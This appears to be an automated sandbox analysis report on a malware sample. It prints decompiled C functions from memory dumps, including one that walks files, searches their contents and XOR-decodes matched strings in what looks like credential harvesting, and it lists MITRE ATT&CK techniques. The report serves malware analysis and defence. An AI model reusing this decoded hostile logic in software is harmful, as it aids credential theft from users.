Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
String ID: http://www.google.com/webhp
API String ID: 2673491915-2670330958
Opcode ID: 74262471973db98e606bb4830f26b245f4106950790f89dff2424101421d910e
Instruction ID: bba17d28731afb945edc1d2094b4380ce1b639f023a30912cec58d7fa11476b9
Opcode Fuzzy Hash: 74262471973db98e606bb4830f26b245f4106950790f89dff2424101421d910e
Instruction Fuzzy Hash: D201D6B1D1122CAACF00EFE9D9444CEFBB8AF48748F10415BE810B7211D7B85A448BD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D6E6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

GetCurrentThreadId.KERNEL32 ref: 0040D719
GetWindowThreadProcessId.USER32(?,00000000), ref: 0040D723

Strings

(B, xrefs: 0040D709

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Thread$CurrentObjectProcessSingleWaitWindow
String ID: (B
API String ID: 419583955-566106762
Opcode ID: 7391d2eaaf0ad22ba1fe50c203308436ca8d8d024ab89ae85fec78b8dd99efe1
Instruction ID: 697024baf9868a06d5c65cae8a446c3be7c000f530ecc04265a5566f9d34419d
Opcode Fuzzy Hash: 7391d2eaaf0ad22ba1fe50c203308436ca8d8d024ab89ae85fec78b8dd99efe1
Instruction Fuzzy Hash: EAF0A722A0113076C7305BEABDCC89B9F58D9853F53544537F208F7251D238480AC6FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040D790, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D790(void* __eax) {
				void* __ebx;
				long _t8;
				intOrPtr _t16;
				struct HWND__* _t19;

				if(__eax + 0x422bee == 0 || E0040EEE1() == 0) {
					return GetCapture();
				}
				_t8 = GetCurrentThreadId();
				_t16 =  *0x4228f0; // 0x0
				if( *((intOrPtr*)(_t16 + 0x10c)) != _t8) {
					L6:
					return 0;
				} else {
					_t19 =  *(_t16 + 0x108);
					if(_t19 == 0 || IsWindow(_t19) != 0) {
						return _t19;
					} else {
						E0040CE22(0, 0x4228e0, _t11, _t11, _t11);
						goto L6;
					}
				}
			}

0x0040d797
0x0040d7e5
0x0040d7e5
0x0040d7a2
0x0040d7a8
0x0040d7b4
0x0040d7dc
0x0040d7df
0x0040d7b6
0x0040d7b6
0x0040d7be
0x0040d7e3
0x0040d7cb
0x0040d7d6
0x00000000
0x0040d7db
0x0040d7be

APIs

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

GetCurrentThreadId.KERNEL32 ref: 0040D7A2
IsWindow.USER32(?), ref: 0040D7C1

Part of subcall function 0040CE22: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040D25B,00000000), ref: 0040CE28
Part of subcall function 0040CE22: ReleaseMutex.KERNEL32(?), ref: 0040CE5C
Part of subcall function 0040CE22: IsWindow.USER32(?), ref: 0040CE63
Part of subcall function 0040CE22: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040CE7D

Strings

(B, xrefs: 0040D7D1

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWaitWindow$CurrentMessageMutexPostReleaseThread
String ID: (B
API String ID: 904989000-566106762
Opcode ID: d9f55aad8d3e92063058ebf0194ec856d7ed529a9148087e655d913b7a67b2e2
Instruction ID: ed004b84c8fe7465209c114a58235bce5a9697f7aad2850445c4cde6a3a9da62
Opcode Fuzzy Hash: d9f55aad8d3e92063058ebf0194ec856d7ed529a9148087e655d913b7a67b2e2
Instruction Fuzzy Hash: B7F0E532B001209FD610AFE5BE846E7B318EB04359349407BF808FB3A1D2B99C468A9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040D740, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D740(void* __eax, void* __ecx) {
				void* __ebx;
				void* __esi;
				long _t7;
				intOrPtr _t18;

				if(E0040EEE1() == 0) {
					return ReleaseCapture();
				}
				_t7 = GetCurrentThreadId();
				_t18 =  *0x4228f0; // 0x0
				if( *((intOrPtr*)(_t18 + 0x10c)) != _t7) {
					SetLastError(5);
					return 0;
				} else {
					E0040CE22(0, 0x4228e0, 0, 0, 0);
					return 1;
				}
			}

0x0040d74f
0x0040d789
0x0040d789
0x0040d751
0x0040d757
0x0040d763
0x0040d780
0x0040d788
0x0040d765
0x0040d773
0x0040d77d
0x0040d77d

APIs

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

GetCurrentThreadId.KERNEL32 ref: 0040D751
SetLastError.KERNEL32(00000005), ref: 0040D780

Part of subcall function 0040CE22: WaitForSingleObject.KERNEL32(?,000000FF,7743A660,0040D25B,00000000), ref: 0040CE28
Part of subcall function 0040CE22: ReleaseMutex.KERNEL32(?), ref: 0040CE5C
Part of subcall function 0040CE22: IsWindow.USER32(?), ref: 0040CE63
Part of subcall function 0040CE22: PostMessageW.USER32(?,00000215,00000000,?), ref: 0040CE7D

Strings

(B, xrefs: 0040D76E

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CurrentErrorLastMessageMutexPostReleaseThreadWindow
String ID: (B
API String ID: 2244431463-566106762
Opcode ID: 9c7b7b7bb0a45b2280571868715cc8538d72ca15d566773adfb871082ef18d41
Instruction ID: de8f5a68a8e8cab295cd0fd9ec70609a6493216c43b0d319137a207753e2337d
Opcode Fuzzy Hash: 9c7b7b7bb0a45b2280571868715cc8538d72ca15d566773adfb871082ef18d41
Instruction Fuzzy Hash: 26E020B1600214AFE700BFF1AE80AB3234DF75030AB4048BEF906F6291D7798C058D5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C05F, Relevance: 5.2, APIs: 4, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040C05F(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t82;
				char* _t83;
				intOrPtr _t85;
				char** _t101;
				char* _t112;
				char* _t121;
				char* _t122;
				void* _t123;
				char* _t126;
				char* _t127;
				char* _t156;
				void* _t157;
				signed int _t166;
				char* _t167;
				char** _t168;
				intOrPtr _t170;
				char* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff8) - 0x294;
				if(E0041BC2F( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t177 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t82 = 2;
					_t83 = E0041B5BF(_t82,  &_v524,  &_v612);
					__eflags = _t83;
					if(_t83 == 0) {
						goto L31;
					}
					_t85 = E00416C43(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t85;
					__eflags = _t85 - 0xffffffff;
					if(_t85 == 0xffffffff) {
						L30:
						E0041B667( &_v612);
						goto L31;
					}
					_v640 = E00416378(0x622);
					E0040F9FD(0x91,  &_v588);
					E0040F9FD(0x92,  &_v628);
					E0040F9FD(0x93,  &_v620);
					E0040F9FD(0x94,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L29:
						E004163A8(_v640);
						E004163C4(_v652, _v656);
						goto L30;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 > 0) {
						do {
							_t166 = _v644;
							_t101 = _v652;
							__eflags =  *(_t101 + _t166 * 4);
							if( *(_t101 + _t166 * 4) == 0) {
								goto L28;
							}
							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
							__eflags = _v676;
							_t167 = _t112;
							if(_v676 == 0) {
								goto L28;
							}
							__eflags = _v672;
							if(_v672 == 0) {
								goto L28;
							}
							__eflags = _t167;
							if(_t167 == 0) {
								goto L28;
							}
							_v676 =  &(_v676[8]);
							_v672 =  &(_v672[6]);
							_t168 =  &(_t167[0xa]);
							_v652 = _t168;
							E0040C045();
							E0040C045();
							E0040C045();
							__eflags = _t156;
							if(_t156 == 0) {
								L15:
								_t157 = 0x15;
								L16:
								__eflags =  *_v676;
								if( *_v676 == 0) {
									goto L28;
								}
								__eflags =  *_v672;
								if( *_v672 == 0) {
									goto L28;
								}
								_t121 =  *_t168;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L28;
								}
								__eflags = _t121 - 0x30;
								if(_t121 == 0x30) {
									L21:
									__eflags = _t168[0];
									if(_t168[0] == 0) {
										goto L28;
									}
									L22:
									_t122 = 0;
									__eflags =  *_t168;
									if( *_t168 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t122[_t168] = _t122[_t168] ^ 0x00000019;
										_t122 =  &(_t122[1]);
										__eflags = _t122[_t168];
									} while (_t122[_t168] != 0);
									__eflags = _t122;
									if(_t122 > 0) {
										_t169 =  &_v580;
										_t123 = 0x57;
										E0040FA33(_t123,  &_v580);
										_push(_t157);
										_push(_v676);
										_t158 = _v656;
										_push(_v652);
										_push(_v672);
										_t126 = E0041709B(_t169, 0x311, _v656, _t169);
										_t174 = _t174 + 0x14;
										__eflags = _t126;
										if(_t126 > 0) {
											_t170 = _a4;
											_t127 = E0041679C(_t126, _t170, _t158);
											__eflags = _t127;
											if(_t127 != 0) {
												_t68 = _t170 + 4;
												 *_t68 =  &(( *(_t170 + 4))[1]);
												__eflags =  *_t68;
											}
										}
									}
									goto L28;
								}
								__eflags = _t121 - 0x31;
								if(_t121 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_v648 =  &(_t156[6]);
							E0040C045();
							_t157 = E00416A27(_v648,  &_v588, 0);
							__eflags = _t157 - 1;
							if(_t157 < 1) {
								goto L15;
							}
							__eflags = _t157 - 0xffff;
							if(_t157 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v644 = _v644 + 1;
							__eflags = _v644 - _v648;
						} while (_v644 < _v648);
					}
					goto L29;
				} else {
					_t171 =  &_v612;
					E0040FA33(0x90, _t171);
					_v648 = _t171;
					E0041BAD3( &_v524,  &_v648, _t177, 1, 5, E0040C05F, _a4, 0, 0, 0);
					goto L31;
				}
			}

0x0040c065
0x0040c083
0x0040c2e3
0x0040c2eb
0x0040c2eb
0x0040c089
0x0040c08c
0x0040c0cf
0x0040c0d2
0x0040c0d7
0x0040c0dc
0x0040c0de
0x00000000
0x00000000
0x0040c0f5
0x0040c0fa
0x0040c0fe
0x0040c101
0x0040c2da
0x0040c2de
0x00000000
0x0040c2de
0x0040c111
0x0040c11e
0x0040c12c
0x0040c13a
0x0040c148
0x0040c14d
0x0040c151
0x0040c2c4
0x0040c2c8
0x0040c2d5
0x00000000
0x0040c2d5
0x0040c157
0x0040c15b
0x0040c15f
0x0040c16b
0x0040c16b
0x0040c16f
0x0040c173
0x0040c177
0x00000000
0x00000000
0x0040c187
0x0040c199
0x0040c1a9
0x0040c1b9
0x0040c1bb
0x0040c1c0
0x0040c1c2
0x00000000
0x00000000
0x0040c1c8
0x0040c1cd
0x00000000
0x00000000
0x0040c1d3
0x0040c1d5
0x00000000
0x00000000
0x0040c1db
0x0040c1e4
0x0040c1e9
0x0040c1ec
0x0040c1f0
0x0040c1f9
0x0040c200
0x0040c205
0x0040c207
0x0040c231
0x0040c233
0x0040c234
0x0040c238
0x0040c23b
0x00000000
0x00000000
0x0040c241
0x0040c244
0x00000000
0x00000000
0x0040c246
0x0040c248
0x0040c24a
0x00000000
0x00000000
0x0040c24c
0x0040c24e
0x0040c254
0x0040c254
0x0040c258
0x00000000
0x00000000
0x0040c25a
0x0040c25a
0x0040c25c
0x0040c25e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040c260
0x0040c260
0x0040c260
0x0040c264
0x0040c265
0x0040c265
0x0040c26b
0x0040c26d
0x0040c271
0x0040c275
0x0040c276
0x0040c27b
0x0040c27c
0x0040c280
0x0040c284
0x0040c28a
0x0040c294
0x0040c299
0x0040c29c
0x0040c29e
0x0040c2a0
0x0040c2a6
0x0040c2ab
0x0040c2ad
0x0040c2af
0x0040c2af
0x0040c2af
0x0040c2af
0x0040c2ad
0x0040c29e
0x00000000
0x0040c26d
0x0040c250
0x0040c252
0x00000000
0x00000000
0x00000000
0x0040c252
0x0040c20e
0x0040c212
0x0040c222
0x0040c224
0x0040c227
0x00000000
0x00000000
0x0040c229
0x0040c22f
0x00000000
0x00000000
0x00000000
0x0040c2b2
0x0040c2b2
0x0040c2ba
0x0040c2ba
0x0040c16b
0x00000000
0x0040c08e
0x0040c08e
0x0040c097
0x0040c09e
0x0040c0be
0x00000000
0x0040c0be

APIs

Part of subcall function 0041BC2F: PathCombineW.SHLWAPI(0040E807,0040E807,?,0040E807,?,?), ref: 0041BC4E

StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 0040C185
StrStrIA.SHLWAPI(?,?), ref: 0040C197
StrStrIA.SHLWAPI(?,?), ref: 0040C1A7
StrStrIA.SHLWAPI(?,?), ref: 0040C1B9

Part of subcall function 0041BAD3: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB12
Part of subcall function 0041BAD3: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BB39
Part of subcall function 0041BAD3: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BB83
Part of subcall function 0041BAD3: Sleep.KERNEL32(00000000,?,?), ref: 0041BBE0
Part of subcall function 0041BAD3: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC0E
Part of subcall function 0041BAD3: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BC20

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID:
API String ID: 1075381090-0
Opcode ID: 0894d953aed1439b375bcf8e731a29ac493e6ec3c19bb1beb190edcef6f7ca5f
Instruction ID: 9ca36659a7b4aa9e63bf3244a43c0fae426a4e28d2255d1cb66667faa08e50ff
Opcode Fuzzy Hash: 0894d953aed1439b375bcf8e731a29ac493e6ec3c19bb1beb190edcef6f7ca5f
Instruction Fuzzy Hash: 01715C71908341DFC720DF65C881A9FB7E5AF85704F010A6FF484A7292D738D94ACB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405BC3, Relevance: 5.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BC3(intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				void* _t13;
				signed int _t19;
				signed short _t26;
				signed int _t30;
				void* _t37;

				_t37 = E00416EF7(_a4);
				if(_t37 > 0x3e8) {
					EnterCriticalSection(0x4228a8);
					E004163A8( *0x42289c);
					 *0x42289c =  *0x42289c & 0x00000000;
					 *0x4228a4 = 0;
					LeaveCriticalSection(0x4228a8);
					return 0;
				}
				EnterCriticalSection(0x4228a8);
				_t26 = ( *0x4228a4 & 0x0000ffff) + _t37;
				if(_t26 <= 0x3e8) {
					_t13 = E00416333(_t26 + _t26, 0x42289c);
					if(_t13 != 0) {
						_t30 =  *0x42289c; // 0x0
						_t13 = E004163E4(_t30 + ( *0x4228a4 & 0x0000ffff) * 2, _a4, _t37 + _t37);
						 *0x4228a4 = _t26;
					}
				} else {
					_t13 = E00416333(0x7d0, 0x42289c);
					if(_t13 != 0) {
						_t18 = 0x3e8 - _t37;
						_t19 =  *0x42289c; // 0x0
						E004163E4(_t19, _t19 + (( *0x4228a4 & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + _t18);
						_t13 = E004163E4(0x3e8 - _t37 + _t18 +  *0x42289c, _v8, _t37 + _t37);
						 *0x4228a4 = 0x3e8;
					}
				}
				LeaveCriticalSection(0x4228a8);
				return _t13;
			}

0x00405bcf
0x00405bd8
0x00405be0
0x00405bec
0x00405bf1
0x00405bfb
0x00405c01
0x00000000
0x00405c01
0x00405c12
0x00405c1f
0x00405c28
0x00405c78
0x00405c7f
0x00405c81
0x00405c9a
0x00405c9f
0x00405c9f
0x00405c2a
0x00405c2f
0x00405c36
0x00405c41
0x00405c48
0x00405c53
0x00405c67
0x00405c6c
0x00405c6c
0x00405c36
0x00405cab
0x00000000

APIs

EnterCriticalSection.KERNEL32(004228A8,?,?,?,00405EB6,?), ref: 00405BE0

Part of subcall function 004163A8: HeapFree.KERNEL32(00000000,00000000,00417B9F,00000000,?,?,?,0040E6CA,00000000,0040EBA4), ref: 004163BB

LeaveCriticalSection.KERNEL32(004228A8,?,?,?,00405EB6,?), ref: 00405C01
EnterCriticalSection.KERNEL32(004228A8,?,?,?,?,00405EB6,?), ref: 00405C12
LeaveCriticalSection.KERNEL32(004228A8,?,?,?,00405EB6,?), ref: 00405CAB

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap
String ID:
API String ID: 1946732658-0
Opcode ID: 8c98e4a713bcc47e4ee27700e85d97a9b3e065b4b3e52fba621c802cef5d1789
Instruction ID: 654a3610b4436ea773b8b84e127ad4b63ff87736c8aca31fc9044148c575746a
Opcode Fuzzy Hash: 8c98e4a713bcc47e4ee27700e85d97a9b3e065b4b3e52fba621c802cef5d1789
Instruction Fuzzy Hash: 6B21C431604214BBDB10AF68EE8497A37A8EF84304744423FF901962B1DB79D842CB6D

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

